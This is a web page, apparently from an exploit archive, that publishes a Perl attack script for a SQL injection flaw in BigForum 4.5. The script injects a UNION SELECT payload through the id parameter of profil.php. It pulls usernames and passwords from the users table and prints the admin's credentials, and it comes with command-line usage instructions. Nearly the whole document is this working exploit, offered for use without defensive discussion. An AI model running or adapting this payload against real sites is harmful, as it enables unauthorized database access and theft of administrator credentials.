Home / os / winme

BigForum Version 4.5 SQL Injection Vulnerability

Posted on 07 March 2010

================================================
BigForum Version 4.5 SQL Injection Vulnerability
================================================

#!/usr/bin/perl
 
use LWP::Simple;
 
print "
";
 
print "##############################################################
";
 
print "# BigForum Version: 4.5 SQL INJECTION                        #
";
 
print "# Author: Ctacok  (Russian)                                  #
";
 
print "# Blog : www.Ctacok.ru                                       #
";
 
print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #
";
 
print "# Require : Magic_quotes = Off                               #
";
 
print "##############################################################
";
 
if (@ARGV < 2)
 
{
 
print "
 Usage: exploit.pl [host] [path] ";
 
print "
 EX : exploit.pl www.localhost.com /path/ 

";
 
exit;
 
}
 
$host=$ARGV[0];
 
$path=$ARGV[1];
 
$vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users";
 
$doc = get($host.$path."profil.php?id=".$vuln."+--+");
 
if ($doc =~ /:::(.+):(.+):(.+):::/){
 
         print "
[+] Admin id: : $1";
 
print "
[+] Admin username: $2";
 
print "
[+] Admin password: $3";
 
}


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP